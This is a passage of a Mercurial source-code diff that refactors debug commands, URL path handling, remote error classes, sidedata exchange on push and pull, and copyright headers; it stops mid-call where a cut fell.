revsetlang, @@ -96,6 +98,7 @@ dateutil, procutil, stringutil, + urlutil, ) from .revlogutils import ( @@ -345,7 +348,7 @@ def showchunks(named): ui.write(b"\n%s%s\n" % (indent_string, named)) for deltadata in gen.deltaiter(): - node, p1, p2, cs, deltabase, delta, flags = deltadata + node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata ui.write( b"%s%s %s %s %s %s %d\n" % ( @@ -371,7 +374,7 @@ raise error.Abort(_(b'use debugbundle2 for this file')) gen.changelogheader() for deltadata in gen.deltaiter(): - node, p1, p2, cs, deltabase, delta, flags = deltadata + node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata ui.write(b"%s%s\n" % (indent_string, hex(node))) @@ -470,27 +473,47 @@ """lists the capabilities of a remote peer""" opts = pycompat.byteskwargs(opts) peer = hg.peer(ui, opts, path) - caps = peer.capabilities() - ui.writenoi18n(b'Main capabilities:\n') - for c in sorted(caps): - ui.write(b' %s\n' % c) - b2caps = bundle2.bundle2caps(peer) - if b2caps: - ui.writenoi18n(b'Bundle2 capabilities:\n') - for key, values in sorted(pycompat.iteritems(b2caps)): - ui.write(b' %s\n' % key) - for v in values: - ui.write(b' %s\n' % v) - - -@command(b'debugchangedfiles', [], b'REV') -def debugchangedfiles(ui, repo, rev): + try: + caps = peer.capabilities() + ui.writenoi18n(b'Main capabilities:\n') + for c in sorted(caps): + ui.write(b' %s\n' % c) + b2caps = bundle2.bundle2caps(peer) + if b2caps: + ui.writenoi18n(b'Bundle2 capabilities:\n') + for key, values in sorted(pycompat.iteritems(b2caps)): + ui.write(b' %s\n' % key) + for v in values: + ui.write(b' %s\n' % v) + finally: + peer.close() + + +@command( + b'debugchangedfiles', + [ + ( + b'', + b'compute', + False, + b"compute information instead of reading it from storage", + ), + ], + b'REV', +) +def debugchangedfiles(ui, repo, rev, **opts): """list the stored files changes for a revision""" ctx = scmutil.revsingle(repo, rev, None) - sd = repo.changelog.sidedata(ctx.rev()) - files_block = sd.get(sidedata.SD_FILES) - if files_block is not None: - files = metadata.decode_files_sidedata(sd) + files = None + + if opts['compute']: + files = metadata.compute_all_files_changes(ctx) + else: + sd = repo.changelog.sidedata(ctx.rev()) + files_block = sd.get(sidedata.SD_FILES) + if files_block is not None: + files = metadata.decode_files_sidedata(sd) + if files is not None: for f in sorted(files.touched): if f in files.added: action = b"added" @@ -964,20 +987,111 @@ ), (b'', b'rev', [], b'restrict discovery to this set of revs'), (b'', b'seed', b'12323', b'specify the random seed use for discovery'), + ( + b'', + b'local-as-revs', + b"", + b'treat local has having these revisions only', + ), + ( + b'', + b'remote-as-revs', + b"", + b'use local as remote, with only these these revisions', + ), ] - + cmdutil.remoteopts, + + cmdutil.remoteopts + + cmdutil.formatteropts, _(b'[--rev REV] [OTHER]'), ) def debugdiscovery(ui, repo, remoteurl=b"default", **opts): - """runs the changeset discovery protocol in isolation""" + """runs the changeset discovery protocol in isolation + + The local peer can be "replaced" by a subset of the local repository by + using the `--local-as-revs` flag. Int he same way, usual `remote` peer can + be "replaced" by a subset of the local repository using the + `--local-as-revs` flag. This is useful to efficiently debug pathological + discovery situation. + + The following developer oriented config are relevant for people playing with this command: + + * devel.discovery.exchange-heads=True + + If False, the discovery will not start with + remote head fetching and local head querying. + + * devel.discovery.grow-sample=True + + If False, the sample size used in set discovery will not be increased + through the process + + * devel.discovery.grow-sample.dynamic=True + + When discovery.grow-sample.dynamic is True, the default, the sample size is + adapted to the shape of the undecided set (it is set to the max of: + <target-size>, len(roots(undecided)), len(heads(undecided) + + * devel.discovery.grow-sample.rate=1.05 + + the rate at which the sample grow + + * devel.discovery.randomize=True + + If andom sampling during discovery are deterministic. It is meant for + integration tests. + + * devel.discovery.sample-size=200 + + Control the initial size of the discovery sample + + * devel.discovery.sample-size.initial=100 + + Control the initial size of the discovery for initial change + """ opts = pycompat.byteskwargs(opts) - remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl)) - remote = hg.peer(repo, opts, remoteurl) - ui.status(_(b'comparing with %s\n') % util.hidepassword(remoteurl)) + unfi = repo.unfiltered() + + # setup potential extra filtering + local_revs = opts[b"local_as_revs"] + remote_revs = opts[b"remote_as_revs"] # make sure tests are repeatable random.seed(int(opts[b'seed'])) + if not remote_revs: + + remoteurl, branches = urlutil.get_unique_pull_path( + b'debugdiscovery', repo, ui, remoteurl + ) + remote = hg.peer(repo, opts, remoteurl) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(remoteurl)) + else: + branches = (None, []) + remote_filtered_revs = scmutil.revrange( + unfi, [b"not (::(%s))" % remote_revs] + ) + remote_filtered_revs = frozenset(remote_filtered_revs) + + def remote_func(x): + return remote_filtered_revs + + repoview.filtertable[b'debug-discovery-remote-filter'] = remote_func + + remote = repo.peer() + remote._repo = remote._repo.filtered(b'debug-discovery-remote-filter') + + if local_revs: + local_filtered_revs = scmutil.revrange( + unfi, [b"not (::(%s))" % local_revs] + ) + local_filtered_revs = frozenset(local_filtered_revs) + + def local_func(x): + return local_filtered_revs + + repoview.filtertable[b'debug-discovery-local-filter'] = local_func + repo = repo.filtered(b'debug-discovery-local-filter') + data = {} if opts.get(b'old'): @@ -1014,8 +1128,21 @@ remoterevs, _checkout = hg.addbranchrevs(repo, remote, branches, revs=None) localrevs = opts[b'rev'] - with util.timedcm('debug-discovery') as t: - common, hds = doit(localrevs, remoterevs) + + fm = ui.formatter(b'debugdiscovery', opts) + if fm.strict_format: + + @contextlib.contextmanager + def may_capture_output(): + ui.pushbuffer() + yield + data[b'output'] = ui.popbuffer() + + else: + may_capture_output = util.nullcontextmanager + with may_capture_output(): + with util.timedcm('debug-discovery') as t: + common, hds = doit(localrevs, remoterevs) # compute all statistics heads_common = set(common) @@ -1066,50 +1193,41 @@ data[b'nb-ini_und-common'] = len(common_initial_undecided) data[b'nb-ini_und-missing'] = len(missing_initial_undecided) + fm.startitem() + fm.data(**pycompat.strkwargs(data)) # display discovery summary - ui.writenoi18n(b"elapsed time: %(elapsed)f seconds\n" % data) - ui.writenoi18n(b"round-trips: %(total-roundtrips)9d\n" % data) - ui.writenoi18n(b"heads summary:\n") - ui.writenoi18n(b" total common heads: %(nb-common-heads)9d\n" % data) - ui.writenoi18n( - b" also local heads: %(nb-common-heads-local)9d\n" % data - ) - ui.writenoi18n( - b" also remote heads: %(nb-common-heads-remote)9d\n" % data - ) - ui.writenoi18n(b" both: %(nb-common-heads-both)9d\n" % data) - ui.writenoi18n(b" local heads: %(nb-head-local)9d\n" % data) - ui.writenoi18n( - b" common: %(nb-common-heads-local)9d\n" % data - ) - ui.writenoi18n( - b" missing: %(nb-head-local-missing)9d\n" % data - ) - ui.writenoi18n(b" remote heads: %(nb-head-remote)9d\n" % data) - ui.writenoi18n( - b" common: %(nb-common-heads-remote)9d\n" % data - ) - ui.writenoi18n( - b" unknown: %(nb-head-remote-unknown)9d\n" % data - ) - ui.writenoi18n(b"local changesets: %(nb-revs)9d\n" % data) - ui.writenoi18n(b" common: %(nb-revs-common)9d\n" % data) - ui.writenoi18n(b" heads: %(nb-common-heads)9d\n" % data) - ui.writenoi18n(b" roots: %(nb-common-roots)9d\n" % data) - ui.writenoi18n(b" missing: %(nb-revs-missing)9d\n" % data) - ui.writenoi18n(b" heads: %(nb-missing-heads)9d\n" % data) - ui.writenoi18n(b" roots: %(nb-missing-roots)9d\n" % data) - ui.writenoi18n(b" first undecided set: %(nb-ini_und)9d\n" % data) - ui.writenoi18n(b" heads: %(nb-ini_und-heads)9d\n" % data) - ui.writenoi18n(b" roots: %(nb-ini_und-roots)9d\n" % data) - ui.writenoi18n(b" common: %(nb-ini_und-common)9d\n" % data) - ui.writenoi18n(b" missing: %(nb-ini_und-missing)9d\n" % data) + fm.plain(b"elapsed time: %(elapsed)f seconds\n" % data) + fm.plain(b"round-trips: %(total-roundtrips)9d\n" % data) + fm.plain(b"heads summary:\n") + fm.plain(b" total common heads: %(nb-common-heads)9d\n" % data) + fm.plain(b" also local heads: %(nb-common-heads-local)9d\n" % data) + fm.plain(b" also remote heads: %(nb-common-heads-remote)9d\n" % data) + fm.plain(b" both: %(nb-common-heads-both)9d\n" % data) + fm.plain(b" local heads: %(nb-head-local)9d\n" % data) + fm.plain(b" common: %(nb-common-heads-local)9d\n" % data) + fm.plain(b" missing: %(nb-head-local-missing)9d\n" % data) + fm.plain(b" remote heads: %(nb-head-remote)9d\n" % data) + fm.plain(b" common: %(nb-common-heads-remote)9d\n" % data) + fm.plain(b" unknown: %(nb-head-remote-unknown)9d\n" % data) + fm.plain(b"local changesets: %(nb-revs)9d\n" % data) + fm.plain(b" common: %(nb-revs-common)9d\n" % data) + fm.plain(b" heads: %(nb-common-heads)9d\n" % data) + fm.plain(b" roots: %(nb-common-roots)9d\n" % data) + fm.plain(b" missing: %(nb-revs-missing)9d\n" % data) + fm.plain(b" heads: %(nb-missing-heads)9d\n" % data) + fm.plain(b" roots: %(nb-missing-roots)9d\n" % data) + fm.plain(b" first undecided set: %(nb-ini_und)9d\n" % data) + fm.plain(b" heads: %(nb-ini_und-heads)9d\n" % data) + fm.plain(b" roots: %(nb-ini_und-roots)9d\n" % data) + fm.plain(b" common: %(nb-ini_und-common)9d\n" % data) + fm.plain(b" missing: %(nb-ini_und-missing)9d\n" % data) if ui.verbose: - ui.writenoi18n( + fm.plain( b"common heads: %s\n" % b" ".join(sorted(short(n) for n in heads_common)) ) + fm.end() _chunksize = 4 << 10 @@ -2214,9 +2332,9 @@ b'', b'dump-new', False, - _(b'write a (new) persistent binary nodemap on stdin'), + _(b'write a (new) persistent binary nodemap on stdout'), ), - (b'', b'dump-disk', False, _(b'dump on-disk data on stdin')), + (b'', b'dump-disk', False, _(b'dump on-disk data on stdout')), ( b'', b'check', @@ -2546,12 +2664,17 @@ with ui.configoverride(overrides): peer = hg.peer(ui, {}, path) - local = peer.local() is not None - canpush = peer.canpush() - - ui.write(_(b'url: %s\n') % peer.url()) - ui.write(_(b'local: %s\n') % (_(b'yes') if local else _(b'no'))) - ui.write(_(b'pushable: %s\n') % (_(b'yes') if canpush else _(b'no'))) + try: + local = peer.local() is not None + canpush = peer.canpush() + + ui.write(_(b'url: %s\n') % peer.url()) + ui.write(_(b'local: %s\n') % (_(b'yes') if local else _(b'no'))) + ui.write( + _(b'pushable: %s\n') % (_(b'yes') if canpush else _(b'no')) + ) + finally: + peer.close() @command( @@ -2654,26 +2777,30 @@ """ target = hg.peer(ui, {}, repopath) - if keyinfo: - key, old, new = keyinfo - with target.commandexecutor() as e: - r = e.callcommand( - b'pushkey', - { - b'namespace': namespace, - b'key': key, - b'old': old, - b'new': new, - }, - ).result() - - ui.status(pycompat.bytestr(r) + b'\n') - return not r - else: - for k, v in sorted(pycompat.iteritems(target.listkeys(namespace))): - ui.write( - b"%s\t%s\n" % (stringutil.escapestr(k), stringutil.escapestr(v)) - ) + try: + if keyinfo: + key, old, new = keyinfo + with target.commandexecutor() as e: + r = e.callcommand( + b'pushkey', + { + b'namespace': namespace, + b'key': key, + b'old': old, + b'new': new, + }, + ).result() + + ui.status(pycompat.bytestr(r) + b'\n') + return not r + else: + for k, v in sorted(pycompat.iteritems(target.listkeys(namespace))): + ui.write( + b"%s\t%s\n" + % (stringutil.escapestr(k), stringutil.escapestr(v)) + ) + finally: + target.close() @command(b'debugpvec', [], _(b'A B')) @@ -3527,8 +3654,10 @@ ) source = b"default" - source, branches = hg.parseurl(ui.expandpath(source)) - url = util.url(source) + source, branches = urlutil.get_unique_pull_path( + b'debugssl', repo, ui, source + ) + url = urlutil.url(source) defaultport = {b'https': 443, b'ssh': 22} if url.scheme in defaultport: @@ -3636,8 +3765,14 @@ for backup in backups: # Much of this is copied from the hg incoming logic - source = ui.expandpath(os.path.relpath(backup, encoding.getcwd())) - source, branches = hg.parseurl(source, opts.get(b"branch")) + source = os.path.relpath(backup, encoding.getcwd()) + source, branches = urlutil.get_unique_pull_path( + b'debugbackupbundle', + repo, + ui, + source, + default_branches=opts.get(b'branch'), + ) try: other = hg.peer(repo, opts, source) except error.LookupError as ex: @@ -3719,6 +3854,23 @@ ui.writenoi18n(b' revision %s\n' % v[1]) +@command(b'debugshell', optionalrepo=True) +def debugshell(ui, repo): + """run an interactive Python interpreter + + The local namespace is provided with a reference to the ui and + the repo instance (if available). + """ + import code + + imported_objects = { + 'ui': ui, + 'repo': repo, + } + + code.interact(local=imported_objects) + + @command( b'debugsuccessorssets', [(b'', b'closest', False, _(b'return closest successors sets only'))], @@ -3779,10 +3931,19 @@ def debugtagscache(ui, repo): """display the contents of .hg/cache/hgtagsfnodes1""" cache = tagsmod.hgtagsfnodescache(repo.unfiltered()) + flog = repo.file(b'.hgtags') for r in repo: node = repo[r].node() tagsnode = cache.getfnode(node, computemissing=False) - tagsnodedisplay = hex(tagsnode) if tagsnode else b'missing/invalid' + if tagsnode: + tagsnodedisplay = hex(tagsnode) + if not flog.hasnode(tagsnode): + tagsnodedisplay += b' (unknown node)' + elif tagsnode is None: + tagsnodedisplay = b'missing' + else: + tagsnodedisplay = b'invalid' + ui.write(b'%d %s %s\n' % (r, hex(node), tagsnodedisplay)) @@ -4000,19 +4161,22 @@ def debugwireargs(ui, repopath, *vals, **opts): opts = pycompat.byteskwargs(opts) repo = hg.peer(ui, opts, repopath) - for opt in cmdutil.remoteopts: - del opts[opt[1]] - args = {} - for k, v in pycompat.iteritems(opts): - if v: - args[k] = v - args = pycompat.strkwargs(args) - # run twice to check that we don't mess up the stream for the next command - res1 = repo.debugwireargs(*vals, **args) - res2 = repo.debugwireargs(*vals, **args) - ui.write(b"%s\n" % res1) - if res1 != res2: - ui.warn(b"%s\n" % res2) + try: + for opt in cmdutil.remoteopts: + del opts[opt[1]] + args = {} + for k, v in pycompat.iteritems(opts): + if v: + args[k] = v + args = pycompat.strkwargs(args) + # run twice to check that we don't mess up the stream for the next command + res1 = repo.debugwireargs(*vals, **args) + res2 = repo.debugwireargs(*vals, **args) + ui.write(b"%s\n" % res1) + if res1 != res2: + ui.warn(b"%s\n" % res2) + finally: + repo.close() def _parsewirelangblocks(fh): @@ -4372,7 +4536,7 @@ # We bypass hg.peer() so we can proxy the sockets. # TODO consider not doing this because we skip # ``hg.wirepeersetupfuncs`` and potentially other useful functionality. - u = util.url(path) + u = urlutil.url(path) if u.scheme != b'http': raise error.Abort(_(b'only http:// paths are currently supported')) diff --git a/mercurial/destutil.py b/mercurial/destutil.py --- a/mercurial/destutil.py +++ b/mercurial/destutil.py @@ -1,6 +1,6 @@ # destutil.py - Mercurial utility function for command destination # -# Copyright Matt Mackall <mpm@selenic.com> and other +# Copyright Olivia Mackall <olivia@selenic.com> and other # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/diffhelper.py b/mercurial/diffhelper.py --- a/mercurial/diffhelper.py +++ b/mercurial/diffhelper.py @@ -1,6 +1,6 @@ # diffhelper.py - helper routines for patch # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/dirstate.py b/mercurial/dirstate.py --- a/mercurial/dirstate.py +++ b/mercurial/dirstate.py @@ -1,6 +1,6 @@ # dirstate.py - working directory tracking for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -73,13 +73,16 @@ @interfaceutil.implementer(intdirstate.idirstate) class dirstate(object): - def __init__(self, opener, ui, root, validate, sparsematchfn): + def __init__( + self, opener, ui, root, validate, sparsematchfn, nodeconstants + ): """Create a new dirstate object. opener is an open()-like callable that can be used to open the dirstate file; root is the root of the directory tracked by the dirstate. """ + self._nodeconstants = nodeconstants self._opener = opener self._validate = validate self._root = root @@ -136,7 +139,9 @@ @propertycache def _map(self): """Return the dirstate contents (see documentation for dirstatemap).""" - self._map = self._mapcls(self._ui, self._opener, self._root) + self._map = self._mapcls( + self._ui, self._opener, self._root, self._nodeconstants + ) return self._map @property @@ -1425,12 +1430,13 @@ denormalized form that they appear as in the dirstate. """ - def __init__(self, ui, opener, root): + def __init__(self, ui, opener, root, nodeconstants): self._ui = ui self._opener = opener self._root = root self._filename = b'dirstate' self._nodelen = 20 + self._nodeconstants = nodeconstants self._parents = None self._dirtyparents = False @@ -1729,7 +1735,8 @@ if rustmod is not None: class dirstatemap(object): - def __init__(self, ui, opener, root): + def __init__(self, ui, opener, root, nodeconstants): + self._nodeconstants = nodeconstants self._ui = ui self._opener = opener self._root = root diff --git a/mercurial/dirstateguard.py b/mercurial/dirstateguard.py --- a/mercurial/dirstateguard.py +++ b/mercurial/dirstateguard.py @@ -1,6 +1,6 @@ # dirstateguard.py - class to allow restoring dirstate after failure # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/discovery.py b/mercurial/discovery.py --- a/mercurial/discovery.py +++ b/mercurial/discovery.py @@ -1,6 +1,6 @@ # discovery.py - protocol changeset discovery functions # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -270,9 +270,12 @@ # C. Update newmap with outgoing changes. # This will possibly add new heads and remove existing ones. newmap = branchmap.remotebranchcache( - (branch, heads[1]) - for branch, heads in pycompat.iteritems(headssum) - if heads[0] is not None + repo, + ( + (branch, heads[1]) + for branch, heads in pycompat.iteritems(headssum) + if heads[0] is not None + ), ) newmap.update(repo, (ctx.rev() for ctx in missingctx)) for branch, newheads in pycompat.iteritems(newmap): diff --git a/mercurial/dispatch.py b/mercurial/dispatch.py --- a/mercurial/dispatch.py +++ b/mercurial/dispatch.py @@ -1,6 +1,6 @@ # dispatch.py - command dispatching for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -50,6 +50,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) @@ -990,7 +991,7 @@ lui.readconfig(os.path.join(path, b".hg", b"hgrc-not-shared"), path) if rpath: - path = lui.expandpath(rpath) + path = urlutil.get_clone_path(lui, rpath)[0] lui = ui.copy() if rcutil.use_repo_hgrc(): _readsharedsourceconfig(lui, path) diff --git a/mercurial/encoding.py b/mercurial/encoding.py --- a/mercurial/encoding.py +++ b/mercurial/encoding.py @@ -1,6 +1,6 @@ # encoding.py - character transcoding support for Mercurial # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -1,6 +1,6 @@ # error.py - Mercurial exceptions # -# Copyright 2005-2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -20,7 +20,13 @@ if pycompat.TYPE_CHECKING: from typing import ( + Any, + AnyStr, + Iterable, + List, Optional, + Sequence, + Union, ) @@ -60,6 +66,7 @@ class SidedataHashError(RevlogError): def __init__(self, key, expected, got): + self.hint = None self.sidedatakey = key self.expecteddigest = expected self.actualdigest = got @@ -77,9 +84,9 @@ # Python 2.6+ complain about the 'message' property being deprecated self.lookupmessage = message if isinstance(name, bytes) and len(name) == 20: - from .node import short + from .node import hex - name = short(name) + name = hex(name) # if name is a binary node, it can be None RevlogError.__init__( self, b'%s@%s: %s' % (index, pycompat.bytestr(name), message) @@ -108,6 +115,7 @@ """Exception raised on errors in parsing the command line.""" def __init__(self, command, message): + # type: (bytes, bytes) -> None self.command = command self.message = message super(CommandError, self).__init__() @@ -119,6 +127,7 @@ """Exception raised if command is not in the command table.""" def __init__(self, command, all_commands=None): + # type: (bytes, Optional[List[bytes]]) -> None self.command = command self.all_commands = all_commands super(UnknownCommand, self).__init__() @@ -130,6 +139,7 @@ """Exception raised if command shortcut matches more than one command.""" def __init__(self, prefix, matches): + # type: (bytes, List[bytes]) -> None self.prefix = prefix self.matches = matches super(AmbiguousCommand, self).__init__() @@ -141,6 +151,7 @@ """Exception raised when a worker process dies.""" def __init__(self, status_code): + # type: (int) -> None self.status_code = status_code # Pass status code to superclass just so it becomes part of __bytes__ super(WorkerError, self).__init__(status_code) @@ -158,6 +169,7 @@ """Exception raised when a continuable command required merge conflict resolution.""" def __init__(self, opname): + # type: (bytes) -> None from .i18n import _ self.opname = opname @@ -193,6 +205,7 @@ return pycompat.sysstr(self.__bytes__()) def format(self): + # type: () -> bytes from .i18n import _ message = _(b"abort: %s\n") % self.message @@ -246,10 +259,12 @@ """Exception raised when parsing config files""" def __init__(self, message, location=None, hint=None): + # type: (bytes, Optional[bytes], Optional[bytes]) -> None super(ConfigError, self).__init__(message, hint=hint) self.location = location def format(self): + # type: () -> bytes from .i18n import _ if self.location is not None: @@ -289,20 +304,34 @@ Abort.__init__(self, _(b'response expected')) -class OutOfBandError(Hint, Exception): +class RemoteError(Abort): + """Exception raised when interacting with a remote repo fails""" + + +class OutOfBandError(RemoteError): """Exception raised when a remote repo reports failure""" - __bytes__ = _tobytes + def __init__(self, message=None, hint=None): + from .i18n import _ + + if message: + # Abort.format() adds a trailing newline + message = _(b"remote error:\n%s") % message.rstrip(b'\n') + else: + message = _(b"remote error") + super(OutOfBandError, self).__init__(message, hint=hint) class ParseError(Abort): """Raised when parsing config files and {rev,file}sets (msg[, pos])""" def __init__(self, message, location=None, hint=None): + # type: (bytes, Optional[Union[bytes, int]], Optional[bytes]) -> None super(ParseError, self).__init__(message, hint=hint) self.location = location def format(self): + # type: () -> bytes from .i18n import _ if self.location is not None: @@ -322,6 +351,7 @@ def getsimilar(symbols, value): + # type: (Iterable[bytes], bytes) -> List[bytes] sim = lambda x: difflib.SequenceMatcher(None, value, x).ratio() # The cutoff for similarity here is pretty arbitrary. It should # probably be investigated and tweaked. @@ -329,6 +359,7 @@ def similarity_hint(similar): + # type: (List[bytes]) -> Optional[bytes] from .i18n import _ if len(similar) == 1: @@ -344,6 +375,7 @@ """Exception raised when a {rev,file}set references an unknown identifier""" def __init__(self, function, symbols): + # type: (bytes, Iterable[bytes]) -> None from .i18n import _ similar = getsimilar(symbols, function) @@ -378,6 +410,7 @@ """Raised if I/O to stdout or stderr fails""" def __init__(self, err): + # type: (IOError) -> None IOError.__init__(self, err.errno, err.strerror) # no __bytes__() because error message is derived from the standard IOError @@ -385,6 +418,7 @@ class UnsupportedMergeRecords(Abort): def __init__(self, recordtypes): + # type: (Iterable[bytes]) -> None from .i18n import _ self.recordtypes = sorted(recordtypes) @@ -403,12 +437,15 @@ """generic exception for aborting from an encounter with an unknown version""" def __init__(self, msg, hint=None, version=None): + # type: (bytes, Optional[bytes], Optional[bytes]) -> None self.version = version super(UnknownVersion, self).__init__(msg, hint=hint) class LockError(IOError): def __init__(self, errno, strerror, filename, desc): + # TODO: figure out if this should be bytes or str + # _type: (int, str, str, bytes) -> None IOError.__init__(self, errno, strerror, filename) self.desc = desc @@ -455,6 +492,7 @@ """Raised if a mercurial (core or extension) developer made a mistake""" def __init__(self, msg, *args, **kwargs): + # type: (AnyStr, Any, Any) -> None # On Python 3, turn the message back into a string since this is # an internal-only error that won't be printed except in a # stack traces. @@ -498,7 +536,7 @@ entries.append(b"%s=%r" % (par, pycompat.maybebytestr(val))) if entries: msg = b'%s - %s' % (msg, b', '.join(entries)) - ValueError.__init__(self, msg) + ValueError.__init__(self, msg) # TODO: convert to str? class ReadOnlyPartError(RuntimeError): @@ -532,6 +570,7 @@ """ def __init__(self, filename, node, tombstone): + # type: (bytes, bytes, bytes) -> None from .node import short StorageError.__init__(self, b'%s:%s' % (filename, short(node))) @@ -587,5 +626,6 @@ """ def __init__(self, message, args=None): + # type: (bytes, Optional[Sequence[bytes]]) -> None self.message = message self.messageargs = args diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -1,6 +1,6 @@ # exchange.py - utility to exchange data between repos. # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -42,6 +42,7 @@ from .utils import ( hashutil, stringutil, + urlutil, ) urlerr = util.urlerr @@ -420,7 +421,20 @@ b'unbundle wire protocol command' ) ) - + for category in sorted(bundle2.read_remote_wanted_sidedata(pushop.remote)): + # Check that a computer is registered for that category for at least + # one revlog kind. + for kind, computers in repo._sidedata_computers.items(): + if computers.get(category): + break + else: + raise error.Abort( + _( + b'cannot push: required sidedata category not supported' + b" by this client: '%s'" + ) + % pycompat.bytestr(category) + ) # get lock as we might write phase data wlock = lock = None try: @@ -814,7 +828,7 @@ data = [] for book, old, new in pushop.outbookmarks: data.append((book, old)) - checkdata = bookmod.binaryencode(data) + checkdata = bookmod.binaryencode(pushop.repo, data) bundler.newpart(b'check:bookmarks', data=checkdata) @@ -865,8 +879,15 @@ if not cgversions: raise error.Abort(_(b'no common changegroup version')) version = max(cgversions) + + remote_sidedata = bundle2.read_remote_wanted_sidedata(pushop.remote) cgstream = changegroup.makestream( - pushop.repo, pushop.outgoing, version, b'push' + pushop.repo, + pushop.outgoing, + version, + b'push', + bundlecaps=b2caps, + remote_sidedata=remote_sidedata, ) cgpart = bundler.newpart(b'changegroup', data=cgstream) if cgversions: @@ -1007,7 +1028,7 @@ _abortonsecretctx(pushop, new, book) data.append((book, new)) allactions.append((book, _bmaction(old, new))) - checkdata = bookmod.binaryencode(data) + checkdata = bookmod.binaryencode(pushop.repo, data) bundler.newpart(b'bookmarks', data=checkdata) def handlereply(op): @@ -1126,19 +1147,19 @@ }, ).result() except error.BundleValueError as exc: - raise error.Abort(_(b'missing support for %s') % exc) + raise error.RemoteError(_(b'missing support for %s') % exc) try: trgetter = None if pushback: trgetter = pushop.trmanager.transaction op = bundle2.processbundle(pushop.repo, reply, trgetter) except error.BundleValueError as exc: - raise error.Abort(_(b'missing support for %s') % exc) + raise error.RemoteError(_(b'missing support for %s') % exc) except bundle2.AbortFromPart as exc: - pushop.ui.status(_(b'remote: %s\n') % exc) + pushop.ui.error(_(b'remote: %s\n') % exc) if exc.hint is not None: - pushop.ui.status(_(b'remote: %s\n') % (b'(%s)' % exc.hint)) - raise error.Abort(_(b'push failed on remote')) + pushop.ui.error(_(b'remote: %s\n') % (b'(%s)' % exc.hint)) + raise error.RemoteError(_(b'push failed on remote')) except error.PushkeyFailed as exc: partid = int(exc.partid) if partid not in pushop.pkfailcb: @@ -1445,7 +1466,7 @@ def transaction(self): """Return an open transaction object, constructing if necessary""" if not self._tr: - trname = b'%s\n%s' % (self.source, util.hidepassword(self.url)) + trname = b'%s\n%s' % (self.source, urlutil.hidepassword(self.url)) self._tr = self.repo.transaction(trname) self._tr.hookargs[b'source'] = self.source self._tr.hookargs[b'url'] = self.url @@ -1607,6 +1628,23 @@ ) % (b', '.join(sorted(missing))) raise error.Abort(msg) + for category in repo._wanted_sidedata: + # Check that a computer is registered for that category for at least + # one revlog kind. + for kind, computers in repo._sidedata_computers.items(): + if computers.get(category): + break + else: + # This should never happen since repos are supposed to be able to + # generate the sidedata they require. + raise error.ProgrammingError( + _( + b'sidedata category requested by local side without local' + b"support: '%s'" + ) + % pycompat.bytestr(category) + ) + pullop.trmanager = transactionmanager(repo, b'pull', remote.url()) wlock = util.nullcontextmanager() if not bookmod.bookmarksinstore(repo): @@ -1820,6 +1858,10 @@ pullop.stepsdone.add(b'obsmarkers') _pullbundle2extraprepare(pullop, kwargs) + remote_sidedata = bundle2.read_remote_wanted_sidedata(pullop.remote) + if remote_sidedata: + kwargs[b'remote_sidedata'] = remote_sidedata + with pullop.remote.commandexecutor() as e: args = dict(kwargs) args[b'source'] = b'pull' @@ -1832,10 +1874,10 @@ op.modes[b'bookmarks'] = b'records' bundle2.processbundle(pullop.repo, bundle, op=op) except bundle2.AbortFromPart as exc: - pullop.repo.ui.status(_(b'remote: abort: %s\n') % exc) - raise error.Abort(_(b'pull failed on remote'), hint=exc.hint) + pullop.repo.ui.error(_(b'remote: abort: %s\n') % exc) + raise error.RemoteError(_(b'pull failed on remote'), hint=exc.hint) except error.BundleValueError as exc: - raise error.Abort(_(b'missing support for %s') % exc) + raise error.RemoteError(_(b'missing support for %s') % exc) if pullop.fetch: pullop.cgresult = bundle2.combinechangegroupresults(op) @@ -2249,7 +2291,13 @@ def getbundlechunks( - repo, source, heads=None, common=None, bundlecaps=None, **kwargs + repo, + source, + heads=None, + common=None, + bundlecaps=None, + remote_sidedata=None, + **kwargs ): """Return chunks constituting a bundle's raw data. @@ -2279,7 +2327,12 @@ return ( info, changegroup.makestream( - repo, outgoing, b'01', source, bundlecaps=bundlecaps + repo, + outgoing, + b'01', + source, + bundlecaps=bundlecaps, + remote_sidedata=remote_sidedata, ), ) @@ -2303,6 +2356,7 @@ source, bundlecaps=bundlecaps, b2caps=b2caps, + remote_sidedata=remote_sidedata, **pycompat.strkwargs(kwargs) ) @@ -2325,6 +2379,7 @@ b2caps=None, heads=None, common=None, + remote_sidedata=None, **kwargs ): """add a changegroup part to the requested bundle""" @@ -2355,7 +2410,13 @@ matcher = None cgstream = changegroup.makestream( - repo, outgoing, version, source, 